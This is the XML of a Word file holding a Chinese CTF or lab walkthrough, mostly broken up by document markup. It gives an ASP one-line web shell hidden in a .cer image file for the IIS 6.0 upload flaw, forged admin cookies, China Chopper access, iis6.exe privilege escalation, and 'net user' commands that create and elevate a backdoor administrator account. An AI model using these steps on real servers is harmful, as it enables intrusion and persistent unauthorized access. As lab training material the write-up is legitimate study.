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050415"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6985"/>
            <wp:docPr id="1" name="图片 1" descr="X2CF[C5J0AMAA}70{(D}J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2CF[C5J0AMAA}70{(D}J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F12 在存储页将cookie改为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNPFINOANFGLPCFBC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且只有这一个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1982470"/>
            <wp:effectExtent l="0" t="0" r="6350" b="17780"/>
            <wp:docPr id="2" name="图片 2" descr="(`643VK2(6AUANPRRVSB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`643VK2(6AUANPRRVSB8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刷新此页面，并点击准备好了吗？进入管理后台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3040" cy="1814195"/>
            <wp:effectExtent l="0" t="0" r="3810" b="14605"/>
            <wp:docPr id="3" name="图片 3" descr="L[3]RA1DDPWD3UB30P~V8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[3]RA1DDPWD3UB30P~V8V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左侧寻找企业管理，点击添加产品，作为上传入口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705100" cy="1476375"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="4" name="图片 4" descr="Z`FAVF6H5R(A_C)B2AE`%[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`FAVF6H5R(A_C)B2AE`%[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1135" cy="1193800"/>
            <wp:effectExtent l="0" t="0" r="5715" b="6350"/>
            <wp:docPr id="5" name="图片 5" descr="02_A3K}ZL)IYEF9]KVIGE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2_A3K}ZL)IYEF9]KVIGE_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通过菜刀得知该后台使用IIS6.0，经过了解得知上传漏洞，使用.cer文件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在本地写下一个asp一句话木马&lt;%eval request("chopper")%&gt;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使用一个不大于100k的图片进行图片码的制作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copy 1.jpg/b+1.txt/a 1.cer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在上述位置上传1.cer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配置菜刀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在菜刀中得到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71135" cy="3341370"/>
            <wp:effectExtent l="0" t="0" r="5715" b="11430"/>
            <wp:docPr id="6" name="图片 6" descr="QZNK0H9EVAJ`BI3]0E)[8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ZNK0H9EVAJ`BI3]0E)[8X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找到flag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第六章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打开第六章网页，与第五章一样进入后台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9230" cy="2057400"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="7" name="图片 7" descr="2BSK~J3QPA@ABNUTF(RS5]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BSK~J3QPA@ABNUTF(RS5]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打开菜刀，连接到后台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访问C盘，没有权限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虚拟终端输入whoami没有权限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2276475" cy="1428750"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="8" name="图片 8" descr="CQACL56[PW3KNT)LT${~7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QACL56[PW3KNT)LT${~7L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使用iis6.exe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whoami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609975" cy="2667000"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="9" name="图片 9" descr="PESVOJ`J)7V_3(7I9WGAD{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ESVOJ`J)7V_3(7I9WGAD{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iis6.exe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net user tjy 123 /add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4010025" cy="2057400"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="11" name="图片 11" descr="23{7~AXT[HQOC$Q}]2A6N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3{7~AXT[HQOC$Q}]2A6NX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net user tjy查看用户信息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733800" cy="3457575"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="12" name="图片 12" descr="(L8{@MDS@E92{FQKRG8``6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(L8{@MDS@E92{FQKRG8``6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将用户添加到管理员用户组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4714875" cy="1981200"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="13" name="图片 13" descr="TN7F6B)6(`(VKBTZ$0HV@X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N7F6B)6(`(VKBTZ$0HV@X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查看ip端口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810000" cy="1800225"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="14" name="图片 14" descr="{5~]KH}T%1X2D[WJ@IXD`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{5~]KH}T%1X2D[WJ@IXD`U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查看所有用户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038725" cy="3143250"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="16" name="图片 16" descr="%7E8FD5KXJ3ZM0@4PG}MN{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%7E8FD5KXJ3ZM0@4PG}MN{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查看ip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4991100" cy="3140710"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="17" name="图片 17" descr="1I6_OJ{KUG9(ZDA$ZJ{FJ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I6_OJ{KUG9(ZDA$ZJ{FJS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查看arp表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914775" cy="1238250"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="18" name="图片 18" descr="27(2P_064CN88}C15`KV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7(2P_064CN88}C15`KV2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查看端口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00650" cy="3305175"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="19" name="图片 19" descr="T(U{`BYA7{LCWKXMQ%[ZM9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(U{`BYA7{LCWKXMQ%[ZM9U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使用创建好提权的用户进行远程连接，查看flag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8595" cy="2618105"/>
            <wp:effectExtent l="0" t="0" r="8255" b="10795"/>
            <wp:docPr id="21" name="图片 21" descr="KLFC]G0CJ}V9[GR)GXNG~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KLFC]G0CJ}V9[GR)GXNG~DK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3381375" cy="1828800"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="22" name="图片 22" descr="F2I6_KXH@}(I$322NW@4P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F2I6_KXH@}(I$322NW@4PP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注销账户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90281"/>
    <w:rsid w:val="03BB39C6"/>
    <w:rsid w:val="08E02C76"/>
    <w:rsid w:val="095C369A"/>
    <w:rsid w:val="0D9B177F"/>
    <w:rsid w:val="0DF24B2D"/>
    <w:rsid w:val="15C04F76"/>
    <w:rsid w:val="16641AC8"/>
    <w:rsid w:val="18DC7051"/>
    <w:rsid w:val="1CEC2832"/>
    <w:rsid w:val="22CA3561"/>
    <w:rsid w:val="23440470"/>
    <w:rsid w:val="2B5C1F78"/>
    <w:rsid w:val="2FE8275E"/>
    <w:rsid w:val="30C379FF"/>
    <w:rsid w:val="3955263E"/>
    <w:rsid w:val="3A3E73E4"/>
    <w:rsid w:val="3B79184E"/>
    <w:rsid w:val="3F0B1B8E"/>
    <w:rsid w:val="445A74CF"/>
    <w:rsid w:val="48853496"/>
    <w:rsid w:val="48CE31A3"/>
    <w:rsid w:val="4D604EE0"/>
    <w:rsid w:val="4DFA51A8"/>
    <w:rsid w:val="50C6463B"/>
    <w:rsid w:val="519B507B"/>
    <w:rsid w:val="52905A04"/>
    <w:rsid w:val="53196C51"/>
    <w:rsid w:val="56CC29AF"/>
    <w:rsid w:val="5DC80F55"/>
    <w:rsid w:val="61B3086D"/>
    <w:rsid w:val="621D1CF8"/>
    <w:rsid w:val="6DE17F8C"/>
    <w:rsid w:val="6E401B74"/>
    <w:rsid w:val="709D24AE"/>
    <w:rsid w:val="71534D62"/>
    <w:rsid w:val="761C11C0"/>
    <w:rsid w:val="79AB3A97"/>
    <w:rsid w:val="7A382864"/>
    <w:rsid w:val="7F57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2020-07-11T00:59:33Z</dcterms:created>
  <dc:creator>82041</dc:creator>
  <cp:lastModifiedBy>京华倦客</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-07-11T02:47:29Z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